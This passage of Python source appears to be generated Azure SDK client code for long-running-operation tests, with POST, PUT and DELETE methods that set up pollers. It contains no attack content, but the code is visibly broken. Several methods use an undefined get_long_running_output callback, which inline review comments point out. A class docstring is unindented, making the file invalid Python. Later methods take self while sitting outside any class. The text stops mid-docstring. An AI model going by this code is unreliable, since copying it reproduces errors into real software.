    def begin_post_double_headers_final_azure_header_get_default(self, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running post request, service returns a 202 to the initial request with both Location and
        Azure-Async header. Poll Azure-Async and its success. Should NOT poll Location to get the
        final object if you support initial Autorest behavior.

        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # response body for status code(s): 202
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post_double_headers_final_azure_header_get_default_initial(
                cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Default ARM polling here (no lro_options): final-state behavior follows
        # azure-core's defaults for this operation.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post_async_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running post request, service returns a 202 to the initial request, with an entity that
        contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
        header for operation status.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }

                # response body for status code(s): 200
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post_async_retry_succeeded_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post_async_no_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running post request, service returns a 202 to the initial request, with an entity that
        contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
        header for operation status.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }

                # response body for status code(s): 200
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post_async_no_retry_succeeded_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post_async_retry_failed(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
        """Long running post request, service returns a 202 to the initial request, with an entity that
        contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
        header for operation status.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns None
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post_async_retry_failed_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_post_async_retrycanceled(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
        """Long running post request, service returns a 202 to the initial request, with an entity that
        contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
        header for operation status.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns None
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._post_async_retrycanceled_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
class LRORetrysOperations(object):
"""LRORetrysOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
    @distributed_trace
    def begin_put201_creating_succeeded200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running put request, service returns a 500, then a 201 to the initial request, with an
        entity that contains ProvisioningState=’Creating’. Polls return this value until the last poll
        returns a ‘200’ with ProvisioningState=’Succeeded’.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }

                # response body for status code(s): 200, 201
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._put201_creating_succeeded200_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    @distributed_trace
    def begin_put_async_relative_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
        """Long running put request, service returns a 500, then a 200 to the initial request, with an
        entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
        Azure-AsyncOperation header for operation status.

        :param product: Product to put.
        :type product: JSONType
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
         operation to not poll, or pass in your own initialized polling object for a personal polling
         strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of LROPoller that returns JSON object
        :rtype: ~azure.core.polling.LROPoller[JSONType]
        :raises: ~azure.core.exceptions.HttpResponseError

        Example:
            .. code-block:: python

                # JSON input template you can fill out and use as your body input.
                product = {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }

                # response body for status code(s): 200
                response.json() == {
                    "id": "str",  # Optional. Resource Id.
                    "location": "str",  # Optional. Resource Location.
                    "name": "str",  # Optional. Resource Name.
                    "properties": {
                        "provisioningState": "str",  # Optional.
                        "provisioningStateValues": "str"  # Optional. Possible values
                          include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                          "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                    },
                    "tags": {
                        "str": "str"  # Optional. A set of tags. Dictionary of
                          :code:`<string>`.
                    },
                    "type": "str"  # Optional. Resource Type.
                }
        """
        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
        if cont_token is None:
            # Fresh run: fire the initial request. The identity ``cls`` keeps the
            # raw pipeline response so the poller can inspect status and headers.
            raw_result = self._put_async_relative_retry_succeeded_initial(
                product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
            )
            kwargs.pop("error_map", None)
        # NOTE(review): ``get_long_running_output`` is referenced below but not
        # defined in this view — confirm the generated deserialization callback
        # was not accidentally removed.
        # Polling strategy: ARM polling by default, NoPolling when the caller
        # passed ``polling=False``, otherwise the caller-supplied PollingMethod.
        if polling is True:
            polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False:
            polling_method = NoPolling()
        else:
            polling_method = polling
        if cont_token:
            # Rehydrate a poller from previously saved state rather than from a
            # new initial request.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_provisioning202_accepted200_succeeded(self, **kwargs: Any) -> LROPoller[JSONType]:
    """Long running delete request, service returns a 500, then a 202 to the initial request, with an
    entity that contains ProvisioningState=’Accepted’. Polls return this value until the last poll
    returns a ‘200’ with ProvisioningState=’Succeeded’.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns JSON object
    :rtype: ~azure.core.polling.LROPoller[JSONType]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # response body for status code(s): 200, 202
            response.json() == {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[JSONType]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._delete_provisioning202_accepted200_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Deserialization callback for the poller: an empty final body maps to None.
        # Was previously referenced but never defined, raising NameError at poll completion.
        response = pipeline_response.http_response
        if response.content:
            deserialized = response.json()
        else:
            deserialized = None
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_retry200(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 500, then a 202 to the initial request. Polls
    return this value until the last poll returns a ‘200’ with ProvisioningState=’Succeeded’.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._delete202_retry200_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # No body to deserialize for a delete; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_succeeded(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 500, then a 202 to the initial request. Poll the
    endpoint indicated in the Azure-AsyncOperation header for operation status.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._delete_async_relative_retry_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # No body to deserialize for a delete; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_retry200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
    """Long running post request, service returns a 500, then a 202 to the initial request, with
    'Location' and 'Retry-After' headers, Polls return a 200 with a response body after success.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. Possible values
                      include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
                      "Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
                },
                "tags": {
                    "str": "str"  # Optional. A set of tags. Dictionary of
                      :code:`<string>`.
                },
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        raw_result = self._post202_retry200_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):  # pylint: disable=inconsistent-return-statements
        # Declared return type is None; only honor a custom `cls` hook.
        # Was previously referenced but never defined, raising NameError at poll completion.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
    """Long running post request, service returns a 500, then a 202 to the initial request, with an
    entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
    Azure-AsyncOperation header for operation status.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
